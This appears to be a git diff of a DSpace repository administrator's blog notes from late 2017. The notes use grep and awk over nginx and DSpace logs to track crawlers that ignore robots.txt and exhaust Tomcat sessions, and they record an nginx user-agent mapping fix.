<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)&#39; dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ask on the dspace-tech mailing list if it&rsquo;s possible to use an existing item as a template for a new item</li>
<li>To follow up on the CORE bot traffic, there were almost 300,000 request yesterday:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h
139109 137.108.70.6
139253 137.108.70.7
</code></pre><ul>
@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I&rsquo;m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable</li>
<li>Actually, come to think of it, they aren&rsquo;t even obeying <code>robots.txt</code>, because we actually disallow <code>/discover</code> and <code>/search-filter</code> URLs but they are hitting those massively:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | grep -o -E &quot;GET /(discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | grep -o -E &#34;GET /(discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
158058 GET /discover
14260 GET /search-filter
</code></pre><ul>

View File

@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -142,12 +142,12 @@ COPY 54701
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre><ul>
<li>Abenet asked if it would be possible to generate a report of items in Listing and Reports that had &ldquo;International Fund for Agricultural Development&rdquo; as the <em>only</em> investor</li>
@ -155,7 +155,7 @@ COPY 54701
<li>Work on making the thumbnails in the item view clickable</li>
<li>Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link</li>
</ul>
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE=&#39;CONTENT&#39;]/mets:file/mets:FLocat[@LOCTYPE=&#39;URL&#39;]/@xlink:href
</code></pre><ul>
<li>METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml</li>
<li>I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!</li>
@ -177,7 +177,7 @@ COPY 54701
<li>It&rsquo;s the first time in a few days that this has happened</li>
<li>I had a look to see what was going on, but it isn&rsquo;t the CORE bot:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
306 68.180.229.31
323 61.148.244.116
414 66.249.66.91
@ -216,7 +216,7 @@ COPY 54701
<ul>
<li>But in the database the authors are correct (none with weird <code>, /</code> characters):</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Livestock Research Institute%&#39;;
text_value | authority | confidence
--------------------------------------------+--------------------------------------+------------
International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c | 0
@ -240,7 +240,7 @@ COPY 54701
<li>Tsega had to restart Tomcat 7 to fix it temporarily</li>
<li>I will start by looking at bot usage (access.log.1 includes usage until 6AM today):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
619 65.49.68.184
840 65.49.68.199
924 66.249.66.91
@ -268,11 +268,11 @@ COPY 54701
</code></pre><ul>
<li>This user is responsible for hundreds and sometimes thousands of Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
954
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
6199
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
7051
</code></pre><ul>
<li>The worst thing is that this user never specifies a user agent string so we can&rsquo;t lump it in with the other bots using the Tomcat Session Crawler Manager Valve</li>
@ -280,7 +280,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</ul>
<pre tabindex="0"><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
4681
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P &#39;GET //?handle&#39;
4618
</code></pre><ul>
<li>I just realized that <code>ciat.cgiar.org</code> points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior</li>
@ -288,44 +288,44 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</ul>
<pre tabindex="0"><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
2034
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:</li>
</ul>
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
5997
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;bingbot&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;bingbot&#34;
5988
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c Google
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
1131
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1
2950
# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
330
</code></pre><ul>
<li>Their user agents vary, ie:
@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I&rsquo;ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs</li>
<li>While it&rsquo;s not in the top ten, Baidu is one bot that seems to not give a fuck:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep -c Baiduspider
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep -c Baiduspider
8912
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep Baiduspider | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep Baiduspider | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
2521
</code></pre><ul>
<li>According to their documentation their bot <a href="http://www.baidu.com/search/robots_english.html">respects <code>robots.txt</code></a>, but I don&rsquo;t see this being the case</li>
@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I should look in nginx access.log, rest.log, oai.log, and DSpace&rsquo;s dspace.log.2017-11-07</li>
<li>Here are the top IPs making requests to XMLUI from 2 to 8 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
279 66.249.66.91
373 65.49.68.199
446 68.180.229.254
@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot</li>
<li>Here are the top IPs making requests to REST from 2 to 8 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
8 207.241.229.237
10 66.249.66.90
16 104.196.152.243
@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The OAI requests during that same time period are nothing to worry about:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
1 66.249.66.92
4 66.249.66.90
6 68.180.229.254
</code></pre><ul>
<li>The top IPs from dspace.log during the 28 AM period:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code>$ grep -E &#39;2017-11-07 0[2-8]&#39; dspace.log.2017-11-07 | grep -o -E &#39;ip_addr=[0-9.]+&#39; | sort -n | uniq -c | sort -h | tail
143 ip_addr=213.55.99.121
181 ip_addr=66.249.66.91
223 ip_addr=157.55.39.161
@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The whois data shows the IP is from China, but the user agent doesn&rsquo;t really give any clues:</li>
</ul>
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F'&quot; ' '{print $3}' | sort | uniq -c | sort -h
210 &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&quot;
22610 &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&quot;
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F&#39;&#34; &#39; &#39;{print $3}&#39; | sort | uniq -c | sort -h
210 &#34;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&#34;
22610 &#34;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&#34;
</code></pre><ul>
<li>A Google search for &ldquo;LCTE bot&rdquo; doesn&rsquo;t return anything interesting, but this <a href="https://stackoverflow.com/questions/42500881/what-is-lcte-in-user-agent">Stack Overflow discussion</a> references the lack of information</li>
<li>So basically after a few hours of looking at the log files I am not closer to understanding what is going on!</li>
@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 1214 hours)</li>
<li>At least for now it seems to be that new Chinese IP (124.17.34.59):</li>
</ul>
<pre tabindex="0"><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
198 207.46.13.103
203 207.46.13.80
205 207.46.13.36
@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>Seems 124.17.34.59 are really downloading all our PDFs, compared to the next top active IPs during this time!</li>
</ul>
<pre tabindex="0"><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
5948
# grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
# grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
0
</code></pre><ul>
<li>About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reuising their Tomcat session and they are creating thousands of sessions per day</li>
<li>All CIAT requests vs unique ones:</li>
</ul>
<pre tabindex="0"><code>$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
<pre tabindex="0"><code>$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | wc -l
3506
$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | sort | uniq | wc -l
3506
</code></pre><ul>
<li>I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API</li>
@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<ul>
<li>But they literally just made this request today:</li>
</ul>
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &quot;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&quot; 200 82265 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot;
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &#34;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&#34; 200 82265 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34;
</code></pre><ul>
<li>Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:</li>
</ul>
<pre tabindex="0"><code># grep -c Baiduspider /var/log/nginx/access.log
3806
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
1085
</code></pre><ul>
<li>I will think about blocking their IPs but they have 164 of them!</li>
</ul>
<pre tabindex="0"><code># grep &quot;Baiduspider/2.0&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#34;Baiduspider/2.0&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq | wc -l
164
</code></pre><h2 id="2017-11-08">2017-11-08</h2>
<ul>
@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Linode sent another alert about CPU usage in the morning at 6:12AM</li>
<li>Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;0[78]/Nov/2017:&quot; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;0[78]/Nov/2017:&#34; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
24981
</code></pre><ul>
<li>This is about 20,000 Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59&#39; | sort | uniq | wc -l
20733
</code></pre><ul>
<li>I&rsquo;m getting really sick of this</li>
@ -498,7 +498,7 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
</ul>
<pre tabindex="0"><code>map $remote_addr $ua {
# 2017-11-08 Random Chinese host grabbing 20,000 PDFs
124.17.34.59 'ChineseBot';
124.17.34.59 &#39;ChineseBot&#39;;
default $http_user_agent;
}
</code></pre><ul>
@ -516,9 +516,9 @@ proxy_set_header User-Agent $ua;
<li>I merged the clickable thumbnails code to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/347">#347</a>) and will deploy it later along with the new bot mapping stuff (and re-run the Asible <code>nginx</code> and <code>tomcat</code> tags)</li>
<li>I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in <code>robots.txt</code>:</li>
</ul>
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
22229
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
0
</code></pre><ul>
<li>It seems that they rarely even bother checking <code>robots.txt</code>, but Google does multiple times per day!</li>
@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
<ul>
<li>Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;09/Nov/2017&#39; | grep -c 104.196.152.243
8956
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
223
</code></pre><ul>
<li>Versus the same stats for yesterday and the day before:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;08/Nov/2017&#39; | grep -c 104.196.152.243
10216
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2592
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep &#39;07/Nov/2017&#39; | grep -c 104.196.152.243
8120
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
3506
</code></pre><ul>
<li>The number of sessions is over <em>ten times less</em>!</li>
@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure templates</a> to be a little more modular and flexible</li>
<li>Looking at the top client IPs on CGSpace so far this morning, even though it&rsquo;s only been eight hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;12/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;12/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
243 5.83.120.111
335 40.77.167.103
424 66.249.66.91
@ -584,21 +584,21 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>5.9.6.51 seems to be a Russian bot:</li>
</ul>
<pre tabindex="0"><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &quot;GET /handle/10568/16515/recent-submissions HTTP/1.1&quot; 200 5097 &quot;-&quot; &quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &#34;GET /handle/10568/16515/recent-submissions HTTP/1.1&#34; 200 5097 &#34;-&#34; &#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;
</code></pre><ul>
<li>What&rsquo;s amazing is that it seems to reuse its Java session across all requests:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2017-11-12
1558
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>Bravo to MegaIndex.ru!</li>
<li>The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat&rsquo;s Crawler Session Manager valve regex should match &lsquo;YandexBot&rsquo;:</li>
</ul>
<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &quot;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&quot; 200 972019 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &#34;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&#34; 200 972019 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2017-11-12
991
</code></pre><ul>
<li>Move some items and collections on CGSpace for Peter Ballantyne, running <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move_collections.sh</code></a> with the following configuration:</li>
